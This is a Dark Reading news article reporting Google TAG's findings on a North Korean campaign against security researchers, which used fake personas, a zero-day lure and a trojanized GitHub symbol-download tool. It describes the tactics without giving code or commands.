North Korean Hackers Target Security Researchers — Again - Dark Reading

THREAT INTELLIGENCE NEWS North Korean Hackers Target Security Researchers — Again This time, they're creating elaborate impostor profiles and using a fresh zero-day and a fake Windows tool to lure in the suspecting. Nate Nelson,Contributing Writer September 7, 2023 3 Min Read SOURCE: PANTHER MEDIA North Korean state-supported threat actors are targeting security researchers — the second such campaign in the last few years. Google first discovered DPRK attackers weren't going after innocent, vulnerable individuals or organizations in January 2021, but rather the cybersecurity professionals themselves. Now the attackers are back, with an all new zero-day vulnerability, a fake software tool, and some remarkably extensive phishing to go along with it, according to a new blog post from Google's Threat Analysis Group. "Unfortunately, the targeting of those involved in cybersecurity research is not rare. In fact, it has grown more frequent and sophisticated over the years," says Callie Guenther, cyber threat research senior manager at Critical Start. "These operations are multifaceted, aiming not just to steal information but also to gain insights into defense mechanisms, refine their tactics, and better evade future detection." Social Engineering for Security Engineers Researchers from Google first caught wind of this strange hacker outfit more than two years ago, when it began to pepper the inboxes of security professionals on social media. The accounts in question were given largely generic-sounding American names like "James Willy" and "Billy Brown," and the social engineers even created real cybersecurity research content in order to lend legitimacy to their fake personas. That level of effort is on display once again in their latest campaign. For example, using a since-deactivated account on X (formerly Twitter), the attackers conducted a monthslong conversation with one of their targets, discussing areas of shared interest and the possibility of a future collaboration. Conversations then typically moved to an encrypted messaging app like Signal or WhatsApp. Once sufficient trust was established, the threat actor would finally forward a file containing a zero-day vulnerability in a popular software package. (Google is withholding further details about either, until the vendor has had time to patch.) If the victim fell for the bait and executed the file, the downloaded shellcode would first check if it's running on a virtual machine — in which case, it would be ineffectual — before sending information about the compromised device, including a screenshot, to attacker-controlled command-and-control (C2) infrastructure. Cops and Robbers Besides this more involved path, the attackers appear to have concocted one more lax method to ensnare the average researcher passerby. From the Github account dbgsymbol, the attackers extend their researcher persona, posting proofs-of-concept (PoCs) and security "tools." The most popular among them — "getsymbol," published last September, and updated multiple times since — markets itself as a "simple tool to download debugging symbols from Microsoft, Google, Mozilla, and Citrix symbol servers for reverse engineers compatible with Windows 8.1, 10 and 11." getsymbol actually does what it says it does. However, it also enables the developers to run arbitrary code on the machine of any researcher who downloaded it. It has been forked 23 times as of this writing. As the protectors of digital security worldwide, Guenther emphasizes, security professionals need to make extra certain that they don't succumb to these sorts of tricks. "The hacking of security researchers is not just about a single successful breach," she says, nor is it just a game to these adversaries. "It's a strategic move. Security researchers are on the forefront of discovering vulnerabilities and developing mitigation techniques. By infiltrating their systems, malicious actors can gain access to yet-to-be-disclosed vulnerabilities, proprietary tools, and valuable databases of threat intelligence. Furthermore, these researchers might be involved in projects of national significance, making them attractive targets for espionage." In an email to Dark Reading, Google TAG offered some advice for potential targets: "Be extremely cautious about what you run and open from unknown third parties. This group has shown they're willing to invest the time to build rapport before attempting any malicious actions." About the Author Nate Nelson Contributing Writer Nate Nelson is a journalist and scriptwriter. He writes for "Darknet Diaries" — the most popular podcast in cybersecurity — and co-created the former Top 20 tech podcast "Malicious Life." Before joining Dark Reading, he was a reporter at Threatpost. More Insights Industry Reports Frost Radar™: Non-human Identity Solutions 2026 CISO AI Risk Report The ROI of AI in Security Cybersecurity Forecast 2026 ThreatLabz 2025 Ransomware Report Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars You May Also Like THREAT INTELLIGENCE React2Shell Exploits Flood the Internet as Attacks Continue by Rob Wright DEC 12, 2025 THREAT INTELLIGENCE Chinese Gov't Fronts Trick the West to Obtain Cyber Tech by Nate Nelson, Contributing Writer OCT 06, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 THREAT INTELLIGENCE Trump Targets Krebs, Revokes SentinelOne Security Clearance by Kristina Beek, Associate Editor, Dark Reading APR 10, 2025 Editor's Choice CYBERSECURITY OPERATIONS Why Stryker's Outage Is a Disaster Recovery Wake-Up Call byJai Vijayan MAR 12, 2026 5 MIN READ APPLICATION SECURITY Microsoft Patches 83 CVEs in March Update byJai Vijayan MAR 11, 2026 4 MIN READ THREAT INTELLIGENCE Commercial Spyware Opponents Fear US Policy Shifting byRob Wright MAR 12, 2026 9 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Building a Robust SOC in a Post-AI World THURS, MARCH 19, 2026 AT 1PM EST Retail Security: Protecting Customer Data and Payment Systems THURS, APRIL 2, 2026 AT 1PM EST Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST More Webinars White Papers Autonomous Pentesting at Machine Speed, Without False Positives Fixing Organizations' Identity Security Posture Best practices for incident response planning Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE